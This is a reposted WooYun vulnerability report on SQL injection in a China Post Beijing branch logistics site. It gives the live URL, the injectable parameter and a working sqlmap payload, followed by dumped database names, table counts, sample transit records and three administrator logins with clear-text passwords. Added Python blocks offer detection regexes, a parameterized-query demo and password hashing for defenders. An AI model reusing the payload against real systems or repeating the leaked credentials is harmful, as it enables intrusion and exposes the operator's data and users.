Multiple SQL injections on a site of China Post's Beijing branch (over a million transit records)

admin · 2017-04-23 22:15:25 · 237 views
Summary

2016-04-09: Details reported to the vendor, awaiting vendor handling
2016-04-09: Vendor confirmed; details visible to the vendor only
2016-04-19: Details opened to core white hats and domain experts
2016-04-29: Details opened to regular white hats
2016-05-09: Details opened to intern white hats
2016-05-24: Details opened to the public

Vulnerability overview

Defect ID: WooYun-2016-194358

Title: Multiple SQL injections on a site of China Post's Beijing branch (over a million transit records)

Vendor: China Post Group Corporation, Information Technology Bureau

Author: 路人甲

Submitted: 2016-04-09 20:05

Published: 2016-05-24 20:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: www.wooyun.org

Tags: asp+sqlserver injection


Vulnerability details

Brief description:

SQL injection in multiple places

Detailed description:

Code:
http://www.bj-cnpl.com

China Postal Express & Logistics Co., Ltd., Beijing Branch

The system has SQL injection in several places, leaking some waybill information.

Code:
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1

(screenshot in the original)

The orderno parameter is injectable.

Code:
current user:    'cnpluser'
Code:
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] AT
[*] ATRACK
[*] master
[*] model
[*] msdb
[*] tempdb
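The sqlmap probe above has three recognisable traits a defender can key on: the CONVERT(INT,(SELECT ...)) cast that forces a conversion error, the CHAR() concatenation that builds sqlmap's marker strings without quote characters, and the ') OR break-out of a quoted, parenthesised predicate. As an added example (not part of the original report), the following Python scanner runs over constructed IIS W3C log lines shaped like that request and flags each trait separately; it also decodes the CHAR() chains so a responder can see what the probe carried. The log lines, field order, timestamps and client addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (made up for this example, not from the report).
# Assumed field order: date time s-ip cs-method cs-uri-stem cs-uri-query s-port
# cs-username c-ip cs(User-Agent) sc-status. The second line carries the same
# probe shape as the sqlmap payload above, URL-encoded the way IIS records it.
SAMPLE_LOG = """\
2016-04-09 12:00:01 10.0.0.5 GET /showstate.asp orderno=CI065580410JP&x=38&y=1 80 - 203.0.113.7 Mozilla/5.0 200
2016-04-09 12:00:02 10.0.0.5 GET /showstate.asp orderno=-3966%27)%20OR%207043=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(118)%2BCHAR(107)%2BCHAR(107)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(7043=7043)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(98)%2BCHAR(112)%2BCHAR(113)%2BCHAR(113)))%20AND%20(%27Quqa%27=%27Quqa&x=38&y=1 80 - 203.0.113.7 sqlmap/1.0 500
2016-04-09 12:00:03 10.0.0.5 GET /showstate.asp orderno=CT287578855CN&x=10&y=4 80 - 198.51.100.9 Mozilla/5.0 200
"""

# Traits of the error-based probe, each a separate signature so an alert can
# say which one fired.
SIGNATURES = {
    # CONVERT(INT,(SELECT ...)) forces a conversion error whose message echoes the selected string
    "error_based_cast": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    # CHAR(n)+CHAR(n)+... builds a string without using quote characters
    "char_concat_chain": re.compile(r"CHAR\(\d+\)(?:\s*\+\s*CHAR\(\d+\))+", re.I),
    # ') followed by OR/AND: closing a quoted, parenthesised predicate
    "quote_paren_boolean": re.compile(r"'\s*\)\s*(?:OR|AND)\s", re.I),
}


def decode_char_chains(sql_fragment):
    """Return the string each CHAR() chain builds. sqlmap brackets the value it
    extracts with such marker strings so it can find it in the error text."""
    return [
        "".join(chr(int(n)) for n in re.findall(r"\d+", m.group()))
        for m in SIGNATURES["char_concat_chain"].finditer(sql_fragment)
    ]


def scan_iis_log(text):
    """Return one finding per request whose query string matches any signature."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):   # skip blanks and W3C header lines
            continue
        fields = line.split(" ")
        if len(fields) < 11:
            continue
        query = unquote_plus(fields[5])        # IIS stores the query string URL-encoded
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hits:
            findings.append({
                "time": f"{fields[0]} {fields[1]}",
                "client": fields[8],
                "uri": fields[4],
                "status": fields[10],
                "signatures": hits,
                "markers": decode_char_chains(query),
            })
    return findings


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["uri"], f["status"], f["signatures"], f["markers"])
```

For the probe above the decoded markers are 'qvkkq' and 'qbpqq'; SQL Server reports the failed cast of 'qvkkq1qbpqq' (the two markers with the CASE result between them) in its error text, which is the channel the error-based technique reads from. A 500 response to a request matching error_based_cast is therefore a strong sign the cast reached the database, whereas the user agent on its own is a weak signal because it is client-controlled.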
Code:
Database: ATRACK
[19 tables]
+---------------------+
| CNPL_DNJ_REDOC |
| Logistic_DNJ |
| Logistic_POD_Status |
| Logistic_Russia |
| Logistic_Shipment |
| Logistic_State |
| Logistic_Upload_D |
| Logistic_Upload_I |
| Logistic_Upload_M |
| Logistic_User |
| MAN_DT |
| MAN_HD |
| atrackdssw21 |
| atrackdssw22 |
| atrackdssw23 |
| atrackdssw24 |
| atrackdssw25 |
| sysdiagrams |
| 中邮与俄方状态对照表|
+---------------------+
Code:
Database: ATRACK
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.Logistic_State | 1641873 |   (transit records)
| dbo.CNPL_DNJ_REDOC | 348257 |
| dbo.Logistic_Upload_I | 1259 |
| dbo.Logistic_Upload_M | 1237 |
| dbo.Logistic_Shipment | 941 |
| dbo.Logistic_POD_Status | 47 |
| dbo.Logistic_Russia | 23 |
| dbo.MAN_DT | 17 |
| dbo.Logistic_User | 11 |
| dbo.Logistic_Upload_D | 6 |
| dbo.MAN_HD | 6 |
| dbo.Logistic_DNJ | 1 |
+-------------------------+---------+
Code:
Table: Logistic_State
[3 entries]
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| 10000 | BPIL870050205 | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心 | admin | Arrived on an airport warehouse | Moscow, Russia | 11 10 2012 3:00PM | <blank> | <blank> | STA 56 |
| 100000 | CT287578855CN | 02 27 2014 9:06AM | Shipment Out of Delivery | 快件外出派送 | admin | <blank> | CANADA | 02 26 2014 12:19PM | <blank> | <blank> | SH003 |
| 1000000 | 98723A925 | 09 22 2015 8:25AM | Shipment forwarded | 快件转运 | admin | <blank> | 东莞 | 09 22 2015 6:57AM | <blank> | <blank> | SH272 |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
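The report does not show the ASP code behind showstate.asp, so the following is an added illustration, not the site's own code: a hypothetical waybill lookup written two ways against an in-memory sqlite3 table that stands in for SQL Server, using column names from the dump above with made-up rows. The concatenated version accepts the same quote-parenthesis break-out the sqlmap payload relies on (the ') at the start of the payload); the parameterized version does not, and an allow-list on the waybill format (an assumption about the real format, based on the numbers in the dump) adds a second layer in front of it.

```python
import re
import sqlite3

# Constructed stand-in for the Logistic_State table: column names from the dump
# above, rows made up for this example.
ROWS = [
    ("BPIL870050205", "Arrived on an airport warehouse", "Moscow, Russia"),
    ("CT287578855CN", "Shipment Out of Delivery", "CANADA"),
    ("98723A925", "Shipment forwarded", "Dongguan"),
]

# Allow-list for the waybill identifier. The numbers in the dump are 9-13
# upper-case alphanumerics, so this pattern is an assumption about the real format.
ORDERNO_RE = re.compile(r"^[A-Z0-9]{6,20}$")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE Logistic_State ("
        "Logistic_State_No TEXT, Logistic_State_Eng TEXT, Logistic_State_City TEXT)"
    )
    con.executemany("INSERT INTO Logistic_State VALUES (?, ?, ?)", ROWS)
    return con


def lookup_concat(con, orderno):
    """Vulnerable pattern (assumed shape of the original query): the user value
    is pasted into a quoted, parenthesised predicate, which is exactly what the
    ') in the report's payload closes."""
    sql = ("SELECT Logistic_State_No, Logistic_State_Eng FROM Logistic_State "
           "WHERE (Logistic_State_No = '" + orderno + "')")
    return con.execute(sql).fetchall()


def lookup_param(con, orderno):
    """Hardened pattern: the value travels as a bound parameter, never as SQL text."""
    sql = ("SELECT Logistic_State_No, Logistic_State_Eng FROM Logistic_State "
           "WHERE (Logistic_State_No = ?)")
    return con.execute(sql, (orderno,)).fetchall()


def validate_orderno(orderno):
    """Second layer: reject anything that does not look like a waybill number."""
    return bool(ORDERNO_RE.match(orderno))


def tracking_lookup(con, orderno):
    """What the endpoint should do: allow-list first, then a parameterized query."""
    if not validate_orderno(orderno):
        return []
    return lookup_param(con, orderno)


if __name__ == "__main__":
    con = make_db()
    normal = "CT287578855CN"
    breakout = "x') OR ('1'='1"   # same break-out shape as the report's payload
    print("concat, normal   :", lookup_concat(con, normal))
    print("concat, breakout :", len(lookup_concat(con, breakout)), "rows (the whole table)")
    print("param,  breakout :", lookup_param(con, breakout))
    print("endpoint, breakout:", tracking_lookup(con, breakout))
```

In classic ASP on SQL Server the equivalent of lookup_param is an ADODB.Command whose CommandText uses a ? placeholder and whose Parameters collection carries the value, instead of building CommandText by string concatenation. The allow-list is a defence in depth, not a substitute for parameters: it would not have stopped an injection through some other field that legitimately contains punctuation.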

Proof of vulnerability:

User passwords and the like are stored unencrypted.

Code:
+------------------+--------------------+---------------------+-----------------------+------------------------+
| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
+------------------+--------------------+---------------------+-----------------------+------------------------+
| 1 | admin | ADMIN | YES | lzyouzheng |
| 10 | emskf | ADMIN | YES | kefuzhongxin |
| 11 | guoji | ADMIN | YES | guojifengongsi |
+------------------+--------------------+---------------------+-----------------------+------------------------+
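The Logistic_User dump shows passwords in clear text, which is why a single injection point turns directly into working administrator logins. As an added example (not code from the report or from the site), the following Python helper shows the storage format that should have been used instead: a random per-user salt with PBKDF2-HMAC-SHA256 from the standard library, a self-describing stored string so the iteration count can be raised later, a constant-time comparison on verification, and a one-time migration of a constructed plaintext user table. The user names and passwords in it are made up.

```python
import hashlib
import hmac
import secrets

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # OWASP's current guidance for PBKDF2-HMAC-SHA256


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing string: algorithm$iterations$salt_hex$digest_hex."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Check a password against a stored string; False for any malformed value,
    including a legacy clear-text one."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        iterations = int(iterations)
    except ValueError:
        return False
    if algorithm != ALGORITHM:
        return False
    computed = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # compare_digest keeps the comparison time independent of where the digests differ
    return hmac.compare_digest(computed, expected)


def needs_rehash(stored, iterations=ITERATIONS):
    """True if the stored value is clear text / unknown format, or weaker than policy."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return True
    try:
        return int(parts[1]) < iterations
    except ValueError:
        return True


# Constructed stand-in for the Logistic_User table (made-up names and passwords).
LEGACY_USERS = [
    {"Logistic_User_ID": 1, "Logistic_User_Name": "example_admin",
     "Logistic_User_Password": "correct horse battery"},
    {"Logistic_User_ID": 2, "Logistic_User_Name": "example_ops",
     "Logistic_User_Password": "plaintext-value"},
]


def migrate_plaintext_table(rows):
    """One-time migration: return a copy of the table with every clear-text
    password replaced by its hash. The input rows are left untouched."""
    migrated = []
    for row in rows:
        new_row = dict(row)
        if needs_rehash(row["Logistic_User_Password"]):
            new_row["Logistic_User_Password"] = hash_password(row["Logistic_User_Password"])
        migrated.append(new_row)
    return migrated


if __name__ == "__main__":
    table = migrate_plaintext_table(LEGACY_USERS)
    for row in table:
        print(row["Logistic_User_Name"], row["Logistic_User_Password"][:40] + "...")
    print(verify_password("plaintext-value", table[1]["Logistic_User_Password"]))  # True
```

Because the stored string names its own algorithm and iteration count, needs_rehash can be called on every successful login to upgrade old entries transparently when the policy is raised; a dump of this table would yield salted PBKDF2 outputs rather than reusable credentials.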

After logging in to the back end, the back end turned out to have SQL injection as well.

Adding a new status entry and submitting a single quote (') in the form triggers a database error (three screenshots in the original).

Two other places (two screenshots in the original)

Fix recommendation:

Copyright notice: when reposting, credit the source, 路人甲@乌云


Vendor response

Vendor assessment:

Severity: Medium

Rank: 5

Confirmed: 2016-04-09 20:12

Vendor reply:

Thanks.

Latest status:

None yet

